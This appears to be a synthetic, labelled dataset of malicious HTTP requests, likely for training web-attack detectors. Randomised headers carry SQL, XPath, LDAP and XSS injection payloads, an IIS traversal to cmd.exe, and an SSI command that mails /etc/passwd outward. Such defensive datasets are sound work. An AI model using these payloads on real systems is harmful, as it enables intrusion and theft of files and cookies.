Transfer-Encoding: gzip
Upgrade: n1LC/2.0, d6dsi/4.8
Warning: 565 www.Stne8T.html "eAh6" "Thu, 04 Dec 08 18:59:50 UTC"
X-Forwarded-For: 129.108.57.155
X-Serial-Number: 6486734154619358
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36132
Start - Id: 39012
class: LdapInjection
POST /cP3hV2Ddl9/cknvteaisniua.dll? HTTP/1.1
Content-Length: 37
Content-Language: lr6g
Content-Encoding: identity
Content-Location: /rKots/hyacl.wav
Content-MD5: ZHpobG9SeVNpdGFmcm5sOA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Aug 05 13:04:07 GMT
Last-Modified: Wed, 22 Sep 04 23:28:45 UTC
Host: www.oehiuloo.be:1367
Connection: close
Accept: application/postscript;q=0.6, audio/*
Accept-Charset: shift_jis, x-mac-cyrillic
Accept-Encoding: *;q=0.2
Accept-Language: arse)(&(objectClass = ez*)
Cache-Control: tsa=ad
Client-ip: 103.25.9.144
Cookie: eJfer9aw0a=naMaenhssvwxduwmR;0sBstqmnaieOred=16525;6wnnah4Ancbmet=:odelete l&)tehttpss 1h;nnEruA=)&/Snetcat3fv?atans
Cookie2: $Version="997"
Date: Sun, 26 Feb 06 06:59:31 CET
ETag: W/"lXyrX6B53KtLWw4i1K3"
Expect: Oupd=rydr
From: rtYnihG@mn4eem.gov
If-Modified-Since: Mon, 19 Jun 06 16:47:38 CET
If-Unmodified-Since: Mon, 26 Jul 04 17:55:04 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 109
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: 6nrucs het0=Atese
Authorization: oae2n5 lfaLe3l=lwblep
Referer: /MuAet/tm3irj/srbceo.nsf
TE: deflate,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/5.0 (compatible; Konqueror/1.9; Linux i386; eypb6s; nunniev)
UA-CPU: 68000
UA-Disp: 672,168,8
UA-Color: color16
UA-Pixels: 960x5747
Via: FTP/9.0 www.eri6m.css
Transfer-Encoding: gzip
Upgrade: yuanig/5.9, tImh/5.1
Warning: 717 67.113.202.67:1 "ssl4asgs3riaesdgfrre" 
X-Forwarded-For: 236.228.179.215
X-Serial-Number: 03718234
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bHiunreret=14&7cXYMN2bV@=services&e

End - Id: 39012
Start - Id: 41343
class: SqlInjection
GET /Wtw2/JFLEOF/oz/tIboSJewoQMQhU/s@RPch1rnLLO77/NI-/hL8.jpeg?Sdoomllfea=166&snnlrt6El=gsfmia5t&loendlsrt=popenjF&ns=s&eaoh2sohxrtl=E8On2jytTn4tl&GuFDpalinkEwp-Ulike=246626&tchy1j=en-ee&Frthr=orevn HTTP/1.0
Host: 44.15.170.21:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.9, gzip, gzip
Accept-Language: hnqt-N, mcyfomke-n4;q=0.9, jijmyc2u-3nesib;q=0.2, fnyk-deaihs;q=0.8, i-wqhhweer;q=0.9
Cache-Control: M='ryakonar'
Client-ip: 104.231.92.120
Cookie: c7ige=530;9iqa='    )  UNION   ALL   SELECT     02,5328,1,39,7877   FROM   aS8n   WHERE    (   ''  = ';WselectBwEFandPvc9s=2;V69rP3uyROku=pts$gidb;C0jdptuM6mE1g1o=childSahst7uc;ett6Oie5rch8i=iwarorhWhg
Date: Thu, 29 Nov 07 21:17:34 UTC
ETag: "L@aXYzXLvTxU2_J"
Expect: hYr341a
If-Modified-Since: Thu, 02 Feb 06 12:26:36 UTC
If-Unmodified-Since: Wed, 08 Feb 06 10:29:45 CET
If-Match: *
If-None-Match: "Sl9Z9c3Vvv5LouOEF1"
If-Range: Tue, 02 Feb 10 22:30:20 UTC
Max-Forwards: 94
Pragma: no-cache
Authorization: NTLM b2RpaW5lZXB5c3Jud251dHVvb25hdHRZZWRlb1duc3NsaG5s
Range: 49-9
Referer: /one1s.ace
TE: chunked,deflate
Trailer: Accept
User-Agent: Mozilla/2.8 (Machintosh; U; PPC 6.5; ts-hl; rv:7.8.1) Gecko/25989925
UA-OS: Win9x
Via: 5.1 13.2.179.252, 1.9 www.teey4iee.jpeg
Transfer-Encoding: compress
Upgrade: rTnh/2.4
X-Forwarded-For: 68.229.77.119
X-Serial-Number: 6950157173290269594

null

End - Id: 41343
Start - Id: 45519
class: PathTransversal
GET /f8Lilocation/n@835fHDlw7M4u.exe?iJpisulco=a%3A%5Cautoexec.bat&amu8Tiao=odocumentmlae HTTP/1.1
Host: 153.232.157.253
Connection: keep-alive
Accept: video/*
Accept-Charset: isiri-3342
Accept-Encoding: gzip, identity;q=0.7, deflate, gzip, gzip;q=0.2
Accept-Language: fto9oT-teOoh2gt, loE-p;q=0.9, OtuECniu-nsJQrDz
Cache-Control: no-transform
Client-ip: 247.212.53.148
Cookie: toa7wssnaVmennF=nwddqmSwqP;rmeZg6k=928904;sam8D93passthruAQxbg=17;387eaNdEeTic=H saesoinsert ;Pupdatelm;1secnglC7eotpmn=iLbx
Cookie2: $Version="727"
Date: Thu, 22 Jun 06 01:39:47 UTC
ETag: "cLx8FTIZFHq_bQt6l"
Expect: ngo6Mwsy
From: t2hldl05@oephweoTmr.de
If-Modified-Since: Sat, 03 May 08 11:45:45 UTC
If-Unmodified-Since: Mon, 01 Jun 09 09:15:42 GMT
If-Match: *
If-None-Match: "oen84j4NYduFR_BRKfWo"
If-Range: *
Max-Forwards: 88
MIME-Version: 9.4
Pragma: zee=9tnaprro
Proxy-Authorization: NTLM bm41ZTRwbnFya2lxbnJ0aGR0RXQwZTVpc05zNGR0ZXJ5cnBvY2ZkZnNu
Authorization: NTLM cFNyaGxyRWVobWlpbm9pcWlyY3VvYWVMamg4cmVJZFNlbkJsb2l0d3JlcjR6ZW0=
Range: 55569-482846
Referer: http://e3eaab.de/tdaz.nsf
TE: gzip,trailers
Trailer: Accept
User-Agent: Mozilla/4.1 (compatible; dItsoebret; Open BSD i386; eeeg; iDedheiSe)
UA-CPU: 68000
UA-Disp: 9630,820,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2096x915
Via: FTP/3.0 www.LeraSla.css
Transfer-Encoding: compress
Upgrade: sJn/9.5, owof/5.6, ooi/5.8, beto/7.5
Warning: 262 www.yptv0dez.html "oibr8oPRotpdsee8a7ax" "Fri, 17 Aug 07 06:53:24 UTC"
X-Forwarded-For: 59.230.132.58
X-Serial-Number: 8223453
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45519
Start - Id: 48454
class: XPathInjection
GET /htpassm6n0mnull_iqj/eZf.s5XHG3KlWn@sLte/qusr@LcSs.P/lnEyl/oPQW9w_av8jVxwOcaaL/tZAP3VRgdXdnS/dsntcmrh7lhDgid.pl?tnattuossarrt=t3rlemn%25u2tn&sIetdnee=%5Bsf HTTP/1.0
Host: www.rihtebSm2.st
Connection: close
Accept: */*
Accept-Charset: windows-1251, euc-kr, x-mac-chinesesimp
Accept-Encoding: compress;q=0.2, identity;q=0.7
Accept-Language: s0ualAa-ii;q=0.7, sauh9-csefziac;q=0.0, sT2a-gRya1, lif-XrniQ, eia-iSjp
Cache-Control: min-fresh=024
Client-ip: 42.242.191.105
Cookie: flaxwnceiUdn=eN]QoeeszoaeawihTe;Uq.M=olNsHbbin9a4;9auTirixaeapukg=zr>urd&tloiOk;zaweegtdrnNs=dSFNwEytRG;yoetn=561;eLFb=6bj']     |     P  |     //user[   name/text(  )    =    'bp
Cookie2: $Version="8"
Date: Mon, 16 Jan 06 05:11:44 CET
ETag: W/"Rop.4gAvUVEhqw9GwpqS"
From: nuehal@ifkmfi.it
If-Modified-Since: Tue, 27 Apr 04 04:46:33 UTC
If-Unmodified-Since: Sat, 03 Jun 06 17:49:16 CET
If-Match: *
If-None-Match: "rAomZ-rw@5JNhhK0z_Bp"
If-Range: "42Rag7Iu9LOValFJ"
Max-Forwards: 9
MIME-Version: 9.2
Pragma: o4=m0
Proxy-Authorization: NTLM ZUFsc2FiY2FtRWVyZTF0VXZ0aG9obm80b3BsYjYxbGh0cmVsMzdhelR3b250ZWxo
Authorization: NTLM bnRseHUxZVRwZWEyaGl6aVNhc2locGV0aHJzd2x3b2VJ
Range: -4
Referer: http://rttirsl.be/qheoUeau/8rc2ru/ahxe.png
TE: trailers
User-Agent: Mozilla/0.2 (X11; U; Linux i386 6.5; 5e-ba; rv:3.4.9) Gecko/61569928
UA-CPU: Sparc
UA-Disp: 3766,742,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 191x184
Via: FTP/8.3 162.92.122.205, lOrwr/7.6 www.Adaei.css
Transfer-Encoding: identity
Upgrade: lofce/6.9, etsctl/7.5, bda/5.5
X-Forwarded-For: 111.85.227.251
X-Serial-Number: 881741666326313
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 48454
Start - Id: 48906
class: XPathInjection
GET /aittSu/aVcnyi3qJ3gpQPHO/sflro6oMtteawese8h/ExojexrRyountqsialo/o8OrNv/cPONeVWXJWc2c/tcopyuvB@Q/t1VnCl8vmipS4nvTRrp/cykaryo04iRat0d.js?9yfdzxtlntiy=9foRfI1&sreauy0sueidiot=5+or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or++++6461%3D&ar4olaw2f=4545479 HTTP/1.1
Host: 149.114.173.53
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 115.108.162.213
Cookie: 002script4H3a=16843;Uz4faciratTaci=24628355;ltcheSdi=1182951559;1hs=orM;HqrlcTda0b=56
Cookie2: $Version="0"
Date: Sun, 15 May 05 15:29:01 GMT
ETag: "WYNhh.HkA-GnzCFmx"
Expect: bnte
From: nui8@hgERemx.net
If-Modified-Since: Sat, 03 Jun 06 15:17:23 GMT
If-Unmodified-Since: Wed, 07 Apr 04 05:57:53 CET
If-Match: "T@_sxNfq59Hr3pi"
If-None-Match: *
If-Range: *
Max-Forwards: 6258
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic blRlaDBtazp0eGVrcDBpNg==
Authorization: NTLM ZWhlbWdiaWh0cWh4YWs5ZWVvOWVwcmR0YTBOdHkzZXQ1M2Vjcm9uQ2g4
Range: 87-22
Referer: /ci8mRrt/wqzq/9Eeo/cenWs/ptittxj.pdf
TE: trailers,gzip;q=0.7
Trailer: Warning
User-Agent: 9siae (tnR@hoj; eYx-2t-m)
UA-CPU: MIPS
UA-Disp: 8730,583,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3997x7266
Via: FTP/5.6 209.101.34.97:58625, 7.8 36.246.113.99, 1.9 www.wonipier.html
Transfer-Encoding: compress
Upgrade: ltr/8.5, jsTkgd/0.2
Warning: 099 www.eSitghtc.htm "2nttveexd" "Tue, 21 Sep 04 15:34:20 CET"
X-Forwarded-For: 1.220.148.94
X-Serial-Number: 58510218762
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48906
Start - Id: 41218
class: SqlInjection
GET /clftnkTr/dbkT1jg.jzdb6eQB1Qj/oei/nehia2oarmSmtswo5e/eycwgfgey.jpg?iaoncaot=37&eEoote0a=p%3Daseerstt&nmfow=6350&zzvAqufD=2919&r4cln=13337212&tOWOIano=input3+hnetcath3Dse&nnm=oapin2 HTTP/1.1
Host: 9.254.157.173
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.9, identity;q=0.1, deflate
Accept-Language: '  union   select @@version,1,1,1--
Client-ip: 14.158.100.251
Cookie2: $Version="35"
Date: Fri, 18 Mar 05 04:01:35 CET
ETag: "BjDMsX3-UNmjL7Yqx50"
If-None-Match: "PendhKkXaNo-W0n3y"
If-Range: Fri, 18 Nov 05 05:49:55 GMT
Max-Forwards: 003
Pragma: no-cache
Referer: /idoe/teoh1lb/ifrap7ce/raa9o.php
User-Agent: xwnr3trmot/6.4
Upgrade: wtini/9.7, nnus/7.6, tdcrs/3.3, awtrj/9.5, 6xe/6.3
----: -----------------------

null

End - Id: 41218
Start - Id: 44186
class: OsCommanding
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.kixbtti.st:0
Connection: j9y8dje
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.0, deflate, deflate, gzip
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 163.193.116.46
Cookie: o2mo=formF;xjpemaasxmovo=14399360;webspedsg=421973
Cookie2: $Version="1"
Date: Fri, 24 Oct 08 07:34:25 CET
ETag: "v0U9uAwSq_0imKTW"
Expect: 100-continue
From: ulnbn@Ssrnr.st
If-Modified-Since: Wed, 29 Aug 07 24:56:10 UTC
If-Unmodified-Since: Wed, 07 Jan 04 03:20:55 GMT
If-Match: *
If-None-Match: ".kTQU1l@3gRY6mN"
If-Range: Thu, 30 Dec 04 04:25:15 GMT
Max-Forwards: 7485
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: cDaurr ereutyh=ddc7ens
Range: 22399-
Referer: http://www.teqIela.biz/633s/tmhqe.avi
TE: trailers
Trailer: Upgrade
User-Agent: imnphLnttrmouabus
UA-CPU: StrongARM
UA-Disp: 054,707,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 389x154
Via: 9.4 35.174.121.35, tadhoe/8.3 82.252.108.104:8, 0.6 www.dbethx.tiff
Transfer-Encoding: deflate
Upgrade: llemvt/2.2, yAhrud/8.0, Cskdn/9.3
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 103.223.39.110
X-Serial-Number: 338223
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44186
Start - Id: 50031
class: XPathInjection
POST /mPxG6/t49qUkpDaSzV80lN/tP-vS6yq3xE3_/h8sbtt9VWU2C/8.sSHRFmwnty/dappgzA7shmIqviooaet/UrbFqNbodywx1S/e3.nsf? HTTP/1.1
Content-Length: 260
Content-Language: hC,sO
Content-Encoding: identity
Content-Location: /ldncUry/oiats/IsSectv/schrn.mspx
Content-MD5: YXd5aXdubW51STVkblJ0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Aug 05 09:44:00 GMT
Last-Modified: Mon, 22 Aug 05 21:26:11 CET
Host: 126.102.20.85:06161
Connection: keep-alive
Accept: application/zip;q=0.9, video/*;q=0.3, audio/*;q=0.7
Accept-Charset: big5, isiri-3342, iso-8859-15, cp-936, windows-1252
Accept-Encoding: 
Accept-Language: (i <  count(am1c0t/child::text())    and  j   <    count(la/child::comment())   and    k   <    count(stw7/child::*)     )
Cache-Control: ijvtr='6e'
Client-ip: 136.198.187.156
Cookie: ris=251683;3wlMo3eenay=tbtze;includeIGwindow.openCMa=l\;rgmeor4eofi=80;a7N-roJ=015
Cookie2: $Version="734"
Date: Tue, 14 Dec 04 20:05:25 CET
Expect: 100-continue
From: nedh@e0uheaoepd.com
If-Modified-Since: Fri, 02 Sep 05 02:47:05 GMT
If-Unmodified-Since: Sun, 16 Jan 05 08:43:29 UTC
If-Match: "KMzcNG87pSHr.PRv"
If-None-Match: "V01Y.j@Ci2f5JIt5"
If-Range: Tue, 29 Jan 08 22:34:11 UTC
Max-Forwards: 8931
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic ZWxiZ2NuazpJRG54dHdkcg==
Authorization: NTLM aGxmc2lyZGdlcmVvMnRhaXJhc2tudThDbGV4YXllZW9ucG5zOTJ0Nw==
Range: 13170-
Referer: http://cdytw8.de/Twf6isa.php3
TE: trailers
User-Agent: Mozilla/9.5 (compatible; MSIE 4.1; WinNT; mt7t; usnhme)
UA-CPU: StrongARM
UA-Disp: 1561,077,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 412x6538
Via: HTTP/8.1 www.tihaiiot.jpg, mstlc/6.6 103.227.255.2:9, FTP/7.0 188.82.141.213
Transfer-Encoding: compress
Upgrade: krorY/3.1, aauet/9.9, ryln/1.4, sdet3d/9.2, yhnlJw/4.6
Warning: 216 60.91.104.152 "dhresrh30etsr" "Tue, 28 Apr 09 18:34:12 CET"
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

re3eIkgp=autoexecepositiong&wfe2=hXwvRlr7j&eriritebsenu=ouHZRPNK&BzYb8QGg=0254&proarme=cHn&ddwOor=7&serab=h d'm;Ii&ZAzoKpSjIK=j+t&eorpEetuut=05&eHl9bcYHj7l=netcataeeeef&htacces28e]p~pzn:o&si6haevrwl4etI=3u$=EfABleqooct&osetiV9esaa=eWJksqQgqTn

End - Id: 50031
Start - Id: 48798
class: XPathInjection
GET /3skyfbXOlmhb/vq/zANX/ehm/tB9i2aR0D/naemer9/etlsa6Nrpinhp/saoiFandbtrCkex2awTs/jfiiotoirhngrl/rMS7scriptgtP/jolpE37MsIPD.DrA@Qr.cfm?ahe=tPv%40as&laPNsrs2hn=771&re=d8csEf%27+or++++%28i+%3C++++count%28nos3s%2Fchild%3A%3Atext%28%29%29++++and+++j++++%3C+++++count%28onn%2Fchild%3A%3Acomment%28%29%29+++++and++k+%3C+++++count%28n4%2Fchild%3A%3A*%29+++++%29++or++++%27obrxo%27++++%3D%27++++trrtsee%27++or&ns8as=497423 HTTP/1.1
Host: 35.50.92.62
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 29.208.224.171
Cookie: c8lihiiebwTcdnl= zRh;eip6l=csrh
Cookie2: $Version="875"
Date: Tue, 27 Nov 07 08:03:09 UTC
ETag: W/".EXNWZ0xRZ8f9BV"
Expect: 100-continue
From: rokltsth@ewew.uk
If-Modified-Since: Wed, 31 Mar 10 04:19:28 GMT
If-Unmodified-Since: Tue, 08 Sep 09 13:43:45 CET
If-Match: "6mHjfmNw2Mpv.4Fc"
If-None-Match: *
If-Range: Wed, 11 Jul 07 11:59:00 CET
Max-Forwards: 756
MIME-Version: 5.2
Pragma: aidoo='9Utgrr2e'
Proxy-Authorization: yeerry vuplo=4rasqRlo
Authorization: NTLM Z1NzbHJOYTZpazFlZ2hlcmFlcWFpa3I1YWVzaW1zV3JjcnNzb3JldE1jOA==
Range: -2670
Referer: http://www.rElq.de/indt/h5rnNi/hzok/urvaUts/eneD.asp
TE: chunked,deflate,trailers
Trailer: If-Match
User-Agent: Mozilla/7.3 (compatible; Konqueror/9.7; Unix; Snfqiase; hnaalee9en; int4wou)
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 682x396
Via: HTTP/2.1 www.tsttIrr.htm, 2.7 113.189.150.76
Transfer-Encoding: compress
Upgrade: zT3/4.9, hrK1te/0.3, iIQppa/8.1, uhVyt/5.1
Warning: 989 42.33.152.171 "ej9c" 
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 9894674694471428
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48798
Start - Id: 38927
class: LdapInjection
GET /haoeiecrntealeIvtd/Jo/uhdXmj3/lmHgneIK/EU.yT8kr4V-ZZIz/eT/acqjp3It_/hiosTidzeE/lmA1B/h5PQ__KeWhw.tiff?hoeiaaiee6aDe=rCEVgAOVs0c&oxzlnrhirdRqpld=o&3Ble3ttriMptoe1=gl%29%28%7C%28opi%3D*%29 HTTP/1.1
Host: 62.3.245.68:80
Connection: keep-alive
Accept: application/x-tar;q=0.5, text/plain, audio/*;q=0.1
Accept-Charset: cp-932
Accept-Encoding: identity;q=0.4, deflate;q=0.0
Accept-Language: *
Cache-Control: max-age=35230
Client-ip: 200.234.213.150
Cookie: 11_pwinntunionyecd_S=1857727;h7untSo=ktroei;uStiYmyhdky=18010
Cookie2: $Version="0"
Date: Sat, 19 Dec 09 07:55:18 GMT
ETag: W/"7-6odv1wYFQZCrb4v"
Expect: t21byh
From: Utnn8c@iodssieo.biz
If-Modified-Since: Wed, 27 Oct 04 02:10:35 CET
If-Unmodified-Since: Sat, 19 Jun 04 14:13:59 CET
If-Match: *
If-None-Match: "63ndIiN7l.Y-a9W"
If-Range: "MYRQCqk8qSHIPwLO"
Max-Forwards: 24
MIME-Version: 7.2
Pragma: n7nlrg='toeogohE'
Proxy-Authorization: mtSl wopwaseh=raeaa
Authorization: Basic bmlJSVR3aWU6czZMM2xy
Range: -48
Referer: http://www.bfhj.cz/iiwl3/sas5t/a3wtha.jpg
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/7.9 (Machintosh; U; Mac OS X 5.8; 0H-ia; rv:3.8.3) Gecko/49277725
UA-CPU: Sparc
UA-Disp: 518,9521,8
UA-OS: Windows 98
UA-Pixels: 024x188
Via: smcm/4.6 127.112.178.109, 8.5 www.uchs.html, 8.0 181.188.205.125
Transfer-Encoding: A0Paa
Upgrade: tydnft/3.9, LrdO/1.4, een6vn/4.0
Warning: 241 39.229.17.174:8 "buhh0su2aszm" 
X-Forwarded-For: 212.86.228.108
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38927
Start - Id: 40149
class: SSI
GET /qwwcKRcGycNw/nOeaoether5qiidvl/ghn3/.aBq8br/lruen/tcR6b.js?sa=%3C%21--+++%23exec++cmd%3D%22%2Fbin%2Fmail+ttia9.com+++%3C++%2Fetc%2Fpasswd%22--%3E&him=7BT22ulj&7r84ecacopwsr8c=ebsl&bgsoundftpdAJaccess_log@b=idLFs3LkSU1&shlLlaatRa=ndOmk&mft=657&trcnroiEot=g7sprmsoso&zNfromJv=sqfru3_.3.&sanQ=Grs%5CiIp&eKCTY1O1=edasie&enbaFEfantd1Nte=z89%40d8 HTTP/1.1
Host: www.ah3pi1.com
Connection: close
Accept: video/*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 1.236.13.170
Cookie: Ir=4372;t9e=6745644;6iosedoe=pnh6e
Cookie2: $Version="029"
Date: Sat, 24 Jan 04 18:11:31 UTC
ETag: "qmJ@VE5bg4LWn_pk"
Expect: mlsu1av
From: stce@ygsk.st
If-Modified-Since: Sat, 05 Sep 09 20:19:26 CET
If-Unmodified-Since: Wed, 05 May 10 01:20:33 GMT
If-Match: *
If-None-Match: *
If-Range: "xVrPC8A0zxEfnwkZ2J"
Max-Forwards: 345
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic SWJlbHQ1dGw6M25Tbm50ZQ==
Authorization: Digest qop=auth
Range: 563-54,0904-,88598-0
Referer: /8dhAeeon/asQY/9lfeth/h3gm.exe
TE: trailers,chunked
Trailer: Warning
User-Agent: twola/2.8.7.7.0
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5714x2082
Via: FTP/1.7 www.trrbtT.gif, FTP/8.6 245.16.69.56
Transfer-Encoding: compress
Upgrade: llr4iH/0.1, ihexp3/7.5, 4cG/7.6, txi/6.5
Warning: 295 www.rsfxckr.tiff "hYSe8lwzauon" "Sat, 27 May 06 19:07:23 CET"
X-Forwarded-For: 197.14.49.35
X-Serial-Number: 014833432
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40149
Start - Id: 42645
class: SqlInjection
GET /ab_00GprF7zTneS-GRA/.ov/reoolsenE6bic0fie7/1uyeuHyaIagtjisa/ozuiAAdgq/8psI/onNhlhoTrndurttRhS/anht9yrubowncn/ohOcH/gt5u/uBDUoVSWvqes.nsf?W.2nph-O43gpF8T=biatgu9eBl&iytd0a=8Q3DGkk3hc&UG7vz7etcwY=674501&nshel=ano&betfoa=Hraroeta%3Asswaoo&lfoetEgw=%27+++%2F**%2F++OR++++%2F**%2F+++++%27fpNnrs%27++%3E+++%27S&g0ssiTnoEjuipn=62703&In4BzRsqq1Qs=180&lcfrde=g%27ueh%25ikesservicesgh61&p0rkdS9i9deGnhl=isNL&s3nr=Itanhj&ah=l0Opb&ipt=o&rgmer2oo=7940001&e7ntNlfthri=s%3DczelXzoNa HTTP/1.0
Host: www.oetfu.st
Connection: tyhdu
Accept: */*;q=0.4
Accept-Charset: iso-8859-9, isiri-3342;q=0.8, windows-1252;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: eiuehtlI-2ey7uiie, e-hf7iil;q=0.5
Cache-Control: no-cache
Client-ip: 75.23.100.154
Cookie: EnullC1TzJreplaceg=83oM
Cookie2: $Version="792"
Date: Tue, 08 Mar 05 12:17:47 UTC
ETag: "w8Zou2YQekyqpbQNzJ"
Expect: 100-continue
From: z74ht@xqb9ivEose.gov
If-Modified-Since: Wed, 26 Dec 07 17:20:41 UTC
If-Unmodified-Since: Thu, 13 Jul 06 14:40:50 GMT
If-Match: "ExamKPEtgjPtMRyFq"
If-None-Match: "EWA4XuiOH33TCLJY@uJ3"
If-Range: "gfx5L.uKa_oSGxQtqe"
Max-Forwards: 6260
MIME-Version: 3.2
Pragma: Bll6o=whtnbe
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: Digest nonce
Range: 72326-9838
Referer: /iounhtro/uufbaoke/locars.php3
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: szeaoth (cbYMZHm3; rdTiWwE; kFbDki9)
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4720x346
Via: FTP/0.7 136.93.198.77:38
Transfer-Encoding: gzip
Upgrade: eyy/2.8, zqo/4.6, tfea/5.6, tnwsfs/8.5, Iut/4.9
Warning: 577 221.133.112.12 "Eaaers" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 81024686129
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42645
Start - Id: 47571
class: XSS
GET /eo2l@Pe5vYfrz51c-0/a81cxjnroy0Gw/R-ySXp/won/cmdmXGlocation@h1AdmH/7etsk3es/.zm/d9uKvSYVL/so6a/peute3lnTfb/sLttsnxaueus5/nuirUylsssehoy8.tiff?jz5cvehtt=w7EL&eejtO7l=mail5A&O57He=tKpxSc&1eouon=RCNl&mHbodyflqcNP=oscwjmWi%28&ZZEKhDH5=mira5rtbottin5n&ete4lmisocitocl=n4n1b&trctjeovce=1&EneyehIj=807798&iftlsttrlee=dropuniontwg8+%26oe&eethnfazDlhndh=%3Cimg+++src++%3D+++%22+++si+++%3E++++%22++onmouseover+%3D+++%22%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.medele.com%2Fcgi-bin%2Ftrveat.cgi%27%2Bdocument.cookie%29%3B%5D+%22++++%3E HTTP/1.1
Host: www.EssDsfn.de
Connection: k3re5nt
Accept: application/postscript;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: deflate, identity, deflate;q=0.9, gzip;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 118.106.166.150
Cookie: ttkaq=501;aanEt5ewhdh9=3
Cookie2: $Version="36"
Date: Mon, 08 Nov 04 08:59:22 GMT
ETag: "jT6yUuV.swlQFpy"
Expect: 100-continue
From: ilyylhh@tttqt1htr.biz
If-Modified-Since: Fri, 08 Jan 10 20:50:19 GMT
If-Unmodified-Since: Fri, 25 Nov 05 17:07:58 CET
If-Match: "MT_hlNFibHJQceJx"
If-None-Match: *
If-Range: Wed, 19 Aug 09 04:41:28 CET
Max-Forwards: 50
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic c0k4dG55OjJFbGFo
Authorization: et1vtr gmhadkba=incdte
Range: 7-,-18566
Referer: /nrsfe/ot4msl/peXs3t.jpg
TE: chunked,gzip
Trailer: Accept-Language
User-Agent: foeEmazw (hyRtlPE; 1yGitI9; rbvAGOLv)
UA-CPU: x86
UA-Disp: 2757,1725,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 924x017
Via: mnozd/9.6 www.t1tz.gif, e0ey/4.6 www.aY6wvi.htm, FTP/9.9 www.mroWrSo9.js
Transfer-Encoding: compress
Upgrade: eTere/4.3, ulLei/2.8
Warning: 084 236.106.31.192:22 "edNteueotaOrbpOeua" "Thu, 03 Jun 04 03:45:24 GMT"
X-Forwarded-For: 113.69.67.238
X-Serial-Number: 2524902769036083814
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 47571
Start - Id: 48244
class: XSS
POST /CHfg1YmochaLl1Nd/includeposition6Du3rqformfromF/uvLfgz/a7U3LKwlu9o0As_ff_82/apotAdslayeugsbT/4helbr/BR.tiff? HTTP/1.0
Content-Length: 132
Content-Language: emxsQ6se
Content-Encoding: identity
Content-Location: http://ihEr.fr/mi4syerm.ace
Content-MD5: ZmhhbzRta2VyaVVlcnNzTA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Fri, 05 Jan 07 12:58:56 UTC
Host: www.dt8hAitiA.it
Connection: close
Accept: application/*
Accept-Charset: ks_c_5601-1987, x-mac-chinesesimp;q=0.2, shift_jis;q=0.0
